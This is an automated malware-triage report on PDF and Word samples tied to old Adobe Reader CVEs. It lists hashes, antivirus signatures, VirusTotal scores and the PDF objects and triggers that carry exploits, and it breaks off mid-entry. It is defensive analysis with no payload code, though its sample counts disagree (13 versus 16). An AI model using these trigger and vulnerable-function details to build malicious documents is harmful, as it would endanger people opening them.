# document-pipeline report 573ac543bff14269adc2df051f7bd4a3  
***Report identification value[^1]:***  573ac543bff14269adc2df051f7bd4a3  
***Pipeline finished at:*** Tue Sep 17 07:50:47 UTC 2019  
***This report was generated at:*** Thu Oct 17 18:32:55 UTC 2019  
***Amount of sample files:*** 13  
  
### Table of Contents  
  * [document-pipeline report 573ac543bff14269adc2df051f7bd4a3](#document-pipeline-report-573ac543bff14269adc2df051f7bd4a3)
      * [Sample files](#sample-files)
    * [Analysing methods](#analysing-methods)
    * [ClamAV analysis results](#clamav-analysis-results)
    * [PDFiD analysis results](#pdfid-analysis-results)
      * [PDFiD Advanced analysis details](#pdfid-advanced-analysis-details)
    * [Peepdf analysis results](#peepdf-analysis-results)
      * [Files found from Virustotal](#files-found-from-virustotal)
      * [PDF files NOT found from Virustotal](#pdf-files-not-found-from-virustotal)
      * [Peepdf advanced analysis](#peepdf-advanced-analysis)
    * [Jsunpack-n and peepdf&#x27;s sctest analysis section](#jsunpack-n-and-peepdfs-sctest-analysis-section)
    * [Strings analysis data](#strings-analysis-data)
    * [Oledump analysis data](#oledump-analysis-data)
    * [Olevba analysis data](#olevba-analysis-data)
      * [Olevba advanced analysis](#olevba-advanced-analysis)
    * [Footnotes](#footnotes)
  
### Sample files  
Following samples were provided to be analysed:  
  
| SHA256 Hash | Filename | Filetype |  
|:---:|:---:|:---:|  
| d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf | CVE-2010-0188_PDF_1C013154B528B332CD1552451F8AD1A3 | pdf |  
| 870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38 | CVE-2010-0188_PDF_2E2124D77A3892566C7F2DF207229960 | pdf |  
| c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5 | CVE-2010-0188_PDF_6AC220194E8B53C70CFACD6D3ED1F455 | pdf |  
| 94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc | CVE_2010-2883_PDF_3670A3F864BB4DCDE9D399CC4E814798 | pdf |  
| ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f | CVE_2010-2883_PDF_83627FF5E21B8AD89224926CE9913110 | pdf |  
| bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc | CVE_2010-2883_PDF_AF6B71B2BA0E9DC903DC2CE677FFB5ED | pdf |  
| 38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e | CVE_2010-2883_PDF_BAB80236FBAA1E241CC0F856C4351A84 | pdf |  
| 2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415 | CVE_2010-2883_PDF_BAE689ECAC665833B71670752DED0C4F | pdf |  
| dc79fe9c352907cecde56be7c335da60fa23044d547edf3f72128645e4184c98 | Notes.docx | vnd.openxmlformats-officedocument.wordprocessingml.document |  
| f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71 | Round_Table_Discussions.doc | msword |  
| e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | tee.txt | x-empty |  
| a7fc11b5bcd8f0f4bd58d1b003202c2c92193adcf8f42fa30873cac92ba15cb9 | testi.bas | plain |  
| 67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac | sample.pdf | pdf |  
  
  
## Analysing methods  
  
  
Following tools have been used for analysing in this report:  
  
| Tool name | Version Information |  
|:---:|:---:|  
| pdfid | pdfid.py 0.2.5 |  
| peepdf | peepdf 0.3 r275 |  
| jsunpackn | jsunpack-network version 0.3.2c (beta) |  
| clamav | ClamAV 0.100.3/25574/Mon Sep 16 08:25:07 2019 |  
| olevba |  |  
| strings | busybox-1.29.3-r10 |  
| oledump | oledump.py 0.0.42 |  
  
  
## ClamAV analysis results  
  
*Click on SHA256 sum*  to see original JSON output file. This contains some advanced details. Advanced details could contain additional metadata and possible components found from the sample file.  
  
See more information about ClamAV in [here.](https://www.clamav.net/)  
  
| SHA256 Hash | Filename | Malwares | Filesize (bytes) | ClamAV Filetype[^2] |  
|:---:|:---:|:---:|:---:|:---:|  
| [38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e](results/json-output/clamav/clamav_38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e.json) | CVE_2010-2883_PDF_BAB80236FBAA1E241CC0F856C4351A84 | **Pdf.Dropper.Agent-1507032**<br> | 149087 | CL_TYPE_PDF |  
| [f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71](results/json-output/clamav/clamav_f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71.json) | Round_Table_Discussions.doc | **Doc.Dropper.Agent-1828517**<br> | 117086 | CL_TYPE_MSWORD |  
| [dc79fe9c352907cecde56be7c335da60fa23044d547edf3f72128645e4184c98](results/json-output/clamav/clamav_dc79fe9c352907cecde56be7c335da60fa23044d547edf3f72128645e4184c98.json) | Notes.docx | *No known malwares found.*  | 13394 | CL_TYPE_OOXML_WORD |  
| [f492374f04bdee33045b43cad57a301cf22e1ca03cdd2c3e90fd3dbdb8cb38a6](results/json-output/clamav/clamav_f492374f04bdee33045b43cad57a301cf22e1ca03cdd2c3e90fd3dbdb8cb38a6.json) | CVE-2010-0188_PDF_05C415D57E92F43578D8DEA73932068B | **Pdf.Dropper.Agent-1506728**<br> | 3499 | CL_TYPE_PDF |  
| [ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f](results/json-output/clamav/clamav_ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f.json) | CVE_2010-2883_PDF_83627FF5E21B8AD89224926CE9913110 | **Pdf.Dropper.Agent-1506750**<br> | 45802 | CL_TYPE_PDF |  
| [41535d04a97c2df7c124d4ca357c1867318cf1852edb2c5dd0600ea42d3bba46](results/json-output/clamav/clamav_41535d04a97c2df7c124d4ca357c1867318cf1852edb2c5dd0600ea42d3bba46.json) | CVE-2010-0188_PDF_0BE85FEC3D98D70F1FB6D08CCEF7FD65 | **Pdf.Exploit.Dropped-90**<br> | 2688 | CL_TYPE_PDF |  
| [bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc](results/json-output/clamav/clamav_bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc.json) | CVE_2010-2883_PDF_AF6B71B2BA0E9DC903DC2CE677FFB5ED | **Heuristics.PDF.ObfuscatedNameObject**<br> **Pdf.Dropper.Agent-1506721**<br> | 45460 | CL_TYPE_PDF |  
| [c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5](results/json-output/clamav/clamav_c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5.json) | CVE-2010-0188_PDF_6AC220194E8B53C70CFACD6D3ED1F455 | **Pdf.Exploit.Dropped-90**<br> | 2696 | CL_TYPE_PDF |  
| [acfaa984e72d62cca6948eba1d70aa5441bfbde7cd9b696d28f17067225b5faf](results/json-output/clamav/clamav_acfaa984e72d62cca6948eba1d70aa5441bfbde7cd9b696d28f17067225b5faf.json) | CVE-2010-0188_PDF_05CB1CB01D66A3B5BAB693377235E24F | *No known malwares found.*  | 3497 | CL_TYPE_PDF |  
| [94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc](results/json-output/clamav/clamav_94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc.json) | CVE_2010-2883_PDF_3670A3F864BB4DCDE9D399CC4E814798 | **Pdf.Dropper.Agent-1506682**<br> | 1083750 | CL_TYPE_PDF |  
| [d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf](results/json-output/clamav/clamav_d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf.json) | CVE-2010-0188_PDF_1C013154B528B332CD1552451F8AD1A3 | **Pdf.Dropper.Agent-1506725**<br> | 2979 | CL_TYPE_PDF |  
| [870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38](results/json-output/clamav/clamav_870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38.json) | CVE-2010-0188_PDF_2E2124D77A3892566C7F2DF207229960 | **Pdf.Exploit.Dropped-90**<br> | 2685 | CL_TYPE_PDF |  
| [d9866a9271fa689a4b1c3224a1b2da399d11d9f9f7b5d253124d944177fb99ac](results/json-output/clamav/clamav_d9866a9271fa689a4b1c3224a1b2da399d11d9f9f7b5d253124d944177fb99ac.json) | CVE-2010-0188_PDF_0C0D4B0B5D5C7CF353C949AFB49E3A66 | *No known malwares found.*  | 3497 | CL_TYPE_PDF |  
| [2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415](results/json-output/clamav/clamav_2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415.json) | CVE_2010-2883_PDF_BAE689ECAC665833B71670752DED0C4F | **Pdf.Dropper.Agent-1828689**<br> | 45664 | CL_TYPE_PDF |  
| [a9e1e95822b3f3fb6d10a1704391f3a8fab33c178f41d61bf717fa6f01b5085d](results/json-output/clamav/clamav_a9e1e95822b3f3fb6d10a1704391f3a8fab33c178f41d61bf717fa6f01b5085d.json) | CVE-2010-0188_PDF_06D8AFC570BA0ACDC1AFE5B2FCC06CB1 | *No known malwares found.*  | 3393 | CL_TYPE_PDF |  
| [fae2bc98e5688e6bd179577a6bebddc7ec48fcc6f1391cda911cc326eb97854e](results/json-output/clamav/clamav_fae2bc98e5688e6bd179577a6bebddc7ec48fcc6f1391cda911cc326eb97854e.json) | CVE-2010-0188_PDF_0C1E79D71B93905CE6016C179E7E5A0B | **Pdf.Exploit.Agent-24281**<br> | 3503 | CL_TYPE_PDF |  
| [67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac](results/json-output/clamav/clamav_67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac.json) | sample.pdf | **Heuristics.PDF.ObfuscatedNameObject**<br> | 5672 | CL_TYPE_PDF |  
  
  
## PDFiD analysis results  
By default, basic analysis is depending on PDFiD&#x27;s triage plugin to fastly classify potential infected PDF samples from clean ones.  
According to plugin source file, plugin score tells different kind of information as:  
  * Score 1.0 means: &#x27;Sample is likely malicious and requires further analysis&#x27;[^3]
  * Score 0.75 means &#x27;/ObjStm detected, analyze sample with pdfid-objstm.bat&#x27;
  * Score 0.5 means &#x27;Sample is likely not malicious but requires further analysis&#x27;
  * Score 0.6 means &#x27;Sample is likely not malicious but could contain phishing or payload URL&#x27;
  * Score 0.0 means &#x27;Sample is likely not malicious, unless you suspect this is used in a targeted/sophisticated attack&#x27;
  
In this case, anything between 1.0 and 0.0 is classified as requiring more analysis. Malicious ones should be analysed further anyway.  
  
*See more general information about this tool in [here](https://blog.didierstevens.com/programs/pdf-tools/).*   
  
#### Likely malicious  
  
| SHA256 Hash | Filename | Triage plugin score |  
|:---:|:---:|:---:|  
| a9e1e95822b3f3fb6d10a1704391f3a8fab33c178f41d61bf717fa6f01b5085d | CVE-2010-0188_PDF_06D8AFC570BA0ACDC1AFE5B2FCC06CB1 | 1.0 |  
| 67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac | sample.pdf | 1.0 |  
| 41535d04a97c2df7c124d4ca357c1867318cf1852edb2c5dd0600ea42d3bba46 | CVE-2010-0188_PDF_0BE85FEC3D98D70F1FB6D08CCEF7FD65 | 1.0 |  
| bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc | CVE_2010-2883_PDF_AF6B71B2BA0E9DC903DC2CE677FFB5ED | 1.0 |  
| 870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38 | CVE-2010-0188_PDF_2E2124D77A3892566C7F2DF207229960 | 1.0 |  
| 2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415 | CVE_2010-2883_PDF_BAE689ECAC665833B71670752DED0C4F | 1.0 |  
| 38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e | CVE_2010-2883_PDF_BAB80236FBAA1E241CC0F856C4351A84 | 1.0 |  
| fae2bc98e5688e6bd179577a6bebddc7ec48fcc6f1391cda911cc326eb97854e | CVE-2010-0188_PDF_0C1E79D71B93905CE6016C179E7E5A0B | 1.0 |  
| d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf | CVE-2010-0188_PDF_1C013154B528B332CD1552451F8AD1A3 | 1.0 |  
| f492374f04bdee33045b43cad57a301cf22e1ca03cdd2c3e90fd3dbdb8cb38a6 | CVE-2010-0188_PDF_05C415D57E92F43578D8DEA73932068B | 1.0 |  
| c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5 | CVE-2010-0188_PDF_6AC220194E8B53C70CFACD6D3ED1F455 | 1.0 |  
| d9866a9271fa689a4b1c3224a1b2da399d11d9f9f7b5d253124d944177fb99ac | CVE-2010-0188_PDF_0C0D4B0B5D5C7CF353C949AFB49E3A66 | 1.0 |  
| ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f | CVE_2010-2883_PDF_83627FF5E21B8AD89224926CE9913110 | 1.0 |  
| 94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc | CVE_2010-2883_PDF_3670A3F864BB4DCDE9D399CC4E814798 | 1.0 |  
| acfaa984e72d62cca6948eba1d70aa5441bfbde7cd9b696d28f17067225b5faf | CVE-2010-0188_PDF_05CB1CB01D66A3B5BAB693377235E24F | 1.0 |  
  
  
#### Likely clean  
None of the input files.  
  
#### Requires more analysis  
None of the input files.  
  
### PDFiD Advanced analysis details  
More advanced details about analysed files one by one. The most precise data can be seen from original result JSON.  
  
**Amount of provided samples:** 16  
**Amount of likely malicious:** 15  
**Amount of likely clean:** 0  
**Amount of requiring more analysis:** 0  
  
  
## Peepdf analysis results  
Listing files which are known as malicious by Virustotal.[^4]  
NOTE: Only PDF files have been analyzed by this tool.  
  
*See more information about this tool in [here](https://eternal-todo.com/tools/peepdf-pdf-analysis-tool).*   
  
### Files found from Virustotal  
  
| SHA256 | Filename | AV Detection rate | Report URL |  
|:---:|:---:|:---:|:---:|  
| 38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e | CVE_2010-2883_PDF_BAB80236FBAA1E241CC0F856C4351A84 | 36/59 | [*URL* ](https://www.virustotal.com/file/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/analysis/1542707855/) |  
| 94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc | CVE_2010-2883_PDF_3670A3F864BB4DCDE9D399CC4E814798 | 33/58 | [*URL* ](https://www.virustotal.com/file/94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc/analysis/1542708409/) |  
| 2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415 | CVE_2010-2883_PDF_BAE689ECAC665833B71670752DED0C4F | 37/59 | [*URL* ](https://www.virustotal.com/file/2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415/analysis/1542707772/) |  
| d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf | CVE-2010-0188_PDF_1C013154B528B332CD1552451F8AD1A3 | 40/58 | [*URL* ](https://www.virustotal.com/file/d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf/analysis/1542708763/) |  
| 67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac | sample.pdf | 34/59 | [*URL* ](https://www.virustotal.com/file/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/analysis/1556800394/) |  
| 870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38 | CVE-2010-0188_PDF_2E2124D77A3892566C7F2DF207229960 | 40/59 | [*URL* ](https://www.virustotal.com/file/870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38/analysis/1542708305/) |  
| fae2bc98e5688e6bd179577a6bebddc7ec48fcc6f1391cda911cc326eb97854e | CVE-2010-0188_PDF_0C1E79D71B93905CE6016C179E7E5A0B | 38/55 | [*URL* ](https://www.virustotal.com/file/fae2bc98e5688e6bd179577a6bebddc7ec48fcc6f1391cda911cc326eb97854e/analysis/1553171760/) |  
| ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f | CVE_2010-2883_PDF_83627FF5E21B8AD89224926CE9913110 | 46/59 | [*URL* ](https://www.virustotal.com/file/ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f/analysis/1568541722/) |  
| d9866a9271fa689a4b1c3224a1b2da399d11d9f9f7b5d253124d944177fb99ac | CVE-2010-0188_PDF_0C0D4B0B5D5C7CF353C949AFB49E3A66 | 39/56 | [*URL* ](https://www.virustotal.com/file/d9866a9271fa689a4b1c3224a1b2da399d11d9f9f7b5d253124d944177fb99ac/analysis/1566381689/) |  
| acfaa984e72d62cca6948eba1d70aa5441bfbde7cd9b696d28f17067225b5faf | CVE-2010-0188_PDF_05CB1CB01D66A3B5BAB693377235E24F | 42/58 | [*URL* ](https://www.virustotal.com/file/acfaa984e72d62cca6948eba1d70aa5441bfbde7cd9b696d28f17067225b5faf/analysis/1566381674/) |  
| f492374f04bdee33045b43cad57a301cf22e1ca03cdd2c3e90fd3dbdb8cb38a6 | CVE-2010-0188_PDF_05C415D57E92F43578D8DEA73932068B | 40/58 | [*URL* ](https://www.virustotal.com/file/f492374f04bdee33045b43cad57a301cf22e1ca03cdd2c3e90fd3dbdb8cb38a6/analysis/1542708959/) |  
| bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc | CVE_2010-2883_PDF_AF6B71B2BA0E9DC903DC2CE677FFB5ED | 44/59 | [*URL* ](https://www.virustotal.com/file/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/analysis/1542708588/) |  
| 41535d04a97c2df7c124d4ca357c1867318cf1852edb2c5dd0600ea42d3bba46 | CVE-2010-0188_PDF_0BE85FEC3D98D70F1FB6D08CCEF7FD65 | 38/59 | [*URL* ](https://www.virustotal.com/file/41535d04a97c2df7c124d4ca357c1867318cf1852edb2c5dd0600ea42d3bba46/analysis/1542707894/) |  
| a9e1e95822b3f3fb6d10a1704391f3a8fab33c178f41d61bf717fa6f01b5085d | CVE-2010-0188_PDF_06D8AFC570BA0ACDC1AFE5B2FCC06CB1 | 43/58 | [*URL* ](https://www.virustotal.com/file/a9e1e95822b3f3fb6d10a1704391f3a8fab33c178f41d61bf717fa6f01b5085d/analysis/1566381673/) |  
| c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5 | CVE-2010-0188_PDF_6AC220194E8B53C70CFACD6D3ED1F455 | 40/59 | [*URL* ](https://www.virustotal.com/file/c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5/analysis/1542708640/) |  
  
  
### PDF files NOT found from Virustotal  
*All files were found from Virustotal.*   
  
### Peepdf advanced analysis  
More advanced analysis results for files one by one. It&#x27;s possible that not all details are included. Check result JSON for all details. Titles for each file below includes detection rates of Virustotal antivirus filechecks  

---
  
<details>  
<summary><b>Detection 36/59</b>: for CVE_2010-2883_PDF_BAB80236FBAA1E241CC0F856C4351A84 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e.json)*   
  
**SHA256:** `38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e`  
**SHA1:** 17acd4de827e726c727c0c8cc9c4e872a328ee6c  
**MD5:** bab80236fbaa1e241cc0f856c4351a84  
**PDF version:** 1.2  
**Filesize (in bytes):** 149087  
**Binary:** True  
**Number of objects:** 44  
**Number of streams:** 13  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44 |  
| Catalog | 1 |  
| Information | 2 |  
| Streams | 5, 21, 22, 23, 24, 25, 28, 30, 32, 34, 40, 43, 44 |  
| Encoded streams | 5, 21, 22, 23, 24, 25, 28, 30, 32, 34, 40, 43, 44 |  
| JavaScript objects | 44 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| CoolType.SING.uniqueName | 34<br> | CVE-2010-2883<br> | CoolType.SING.uniqueName |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 39 |  
| /JavaScript | 39 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 1 |  
| /OpenAction | 1 |  
| /XFA | 41 |  
  
**JS vulneralibities:** {&#x27;name&#x27;: &#x27;getIcon&#x27;, &#x27;objects&#x27;: [44], &#x27;vuln_cve_list&#x27;: [&#x27;CVE-2009-0927&#x27;], &#x27;vuln_name&#x27;: &#x27;getIcon&#x27;}, {&#x27;name&#x27;: &#x27;Collab.collectEmailInfo&#x27;, &#x27;objects&#x27;: [44], &#x27;vuln_cve_list&#x27;: [&#x27;CVE-2007-5659&#x27;], &#x27;vuln_name&#x27;: &#x27;Collab.collectEmailInfo&#x27;}  
  
</details>  

---
  
<details>  
<summary><b>Detection 33/58</b>: for CVE_2010-2883_PDF_3670A3F864BB4DCDE9D399CC4E814798 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc.json)*   
  
**SHA256:** `94777d47bb8af2112eebdab13fd87addb61283cb3b2cd58d93855112780891fc`  
**SHA1:** 1ee780ab3b87fad953bebb4b0d068774e115e87d  
**MD5:** 3670a3f864bb4dcde9d399cc4e814798  
**PDF version:** 1.4  
**Filesize (in bytes):** 1083750  
**Binary:** True  
**Number of objects:** 60  
**Number of streams:** 20  
**Encrypted:** True  
**Encryption algorithms:** *RC4*  - Bits: *128*   
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60 |  
| Catalog | 1 |  
| Streams | 5, 17, 18, 19, 20, 21, 22, 23, 24, 28, 32, 34, 36, 50, 51, 52, 53, 57, 58, 59 |  
| Error objects | 29 |  
| JavaScript objects | 29 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| CoolType.SING.uniqueName | 59<br> | CVE-2010-2883<br> | CoolType.SING.uniqueName |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 29 |  
| /JavaScript | 2, 29 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AA | 8 |  
| /AcroForm | 1 |  
| /Names | 1, 7 |  
| /XFA | 6 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 37/59</b>: for CVE_2010-2883_PDF_BAE689ECAC665833B71670752DED0C4F (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415.json)*   
  
**SHA256:** `2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415`  
**SHA1:** 422c76ba5e2210acb80690bcd0cc2146c706119e  
**MD5:** bae689ecac665833b71670752ded0c4f  
**PDF version:** 1.4  
**Filesize (in bytes):** 45664  
**Binary:** True  
**Number of objects:** 21  
**Number of streams:** 6  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 23, 24 |  
| Catalog | 1 |  
| Information | 4 |  
| Streams | 24, 5, 7, 10, 17, 17 |  
| Encoded streams | 5, 7, 17, 17 |  
| JavaScript objects | 5, 7 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| CoolType.SING.uniqueName | 17<br> | CVE-2010-2883<br> | CoolType.SING.uniqueName |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 3 |  
| /JavaScript | 3 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 1 |  
| /OpenAction | 1 |  
| /XFA | 23 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 40/58</b>: for CVE-2010-0188_PDF_1C013154B528B332CD1552451F8AD1A3 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf.json)*   
  
**SHA256:** `d0f47f664dac6d78ebab3e905f99bdda6c19347dde0ffbeee71c0796495ec4cf`  
**SHA1:** ea9e32da54d349bcc210d12be0bebad8f8bd70d8  
**MD5:** 1c013154b528b332cd1552451f8ad1a3  
**PDF version:** 1.6  
**Filesize (in bytes):** 2979  
**Binary:** True  
**Number of objects:** 8  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8 |  
| Catalog | 7 |  
| Streams | 1 |  
| Encoded streams | 1 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| /EmbeddedFile | 1<br> |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 7 |  
| /XFA | 8 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 34/59</b>: for sample.pdf (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac.json)*   
  
**SHA256:** `67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac`  
**SHA1:** adc2da1ee93f9708f92a86bfd03ea01c8d2befa9  
**MD5:** 45347f15c27099cd11b1f2097ef00578  
**PDF version:** 1.5  
**Filesize (in bytes):** 5672  
**Binary:** True  
**Number of objects:** 6  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6 |  
| Catalog | 1 |  
| Streams | 6 |  
| Encoded streams | 6 |  
| Error objects | 6 |  
| JavaScript objects | 6 |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 5 |  
| /JavaScript | 5 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /OpenAction | 1 |  
  
**JS vulneralibities:** {&#x27;name&#x27;: &#x27;util.printf&#x27;, &#x27;objects&#x27;: [6], &#x27;vuln_cve_list&#x27;: [&#x27;CVE-2008-2992&#x27;], &#x27;vuln_name&#x27;: &#x27;util.printf&#x27;}  
  
</details>  

---
  
<details>  
<summary><b>Detection 40/59</b>: for CVE-2010-0188_PDF_2E2124D77A3892566C7F2DF207229960 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38.json)*   
  
**SHA256:** `870f83d351660b44f2e40ed5caa23844e92537966689c845a2a0af26b5dded38`  
**SHA1:** 8b1c06c65698165429feb343ecbe653cc9d884f6  
**MD5:** 2e2124d77a3892566c7f2df207229960  
**PDF version:** 1.5  
**Filesize (in bytes):** 2685  
**Binary:** True  
**Number of objects:** 8  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8 |  
| Catalog | 7 |  
| Streams | 1 |  
| Encoded streams | 1 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| /EmbeddedFile | 1<br> |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 7 |  
| /XFA | 8 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 38/55</b>: for CVE-2010-0188_PDF_0C1E79D71B93905CE6016C179E7E5A0B (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_fae2bc98e5688e6bd179577a6bebddc7ec48fcc6f1391cda911cc326eb97854e.json)*   
  
**SHA256:** `fae2bc98e5688e6bd179577a6bebddc7ec48fcc6f1391cda911cc326eb97854e`  
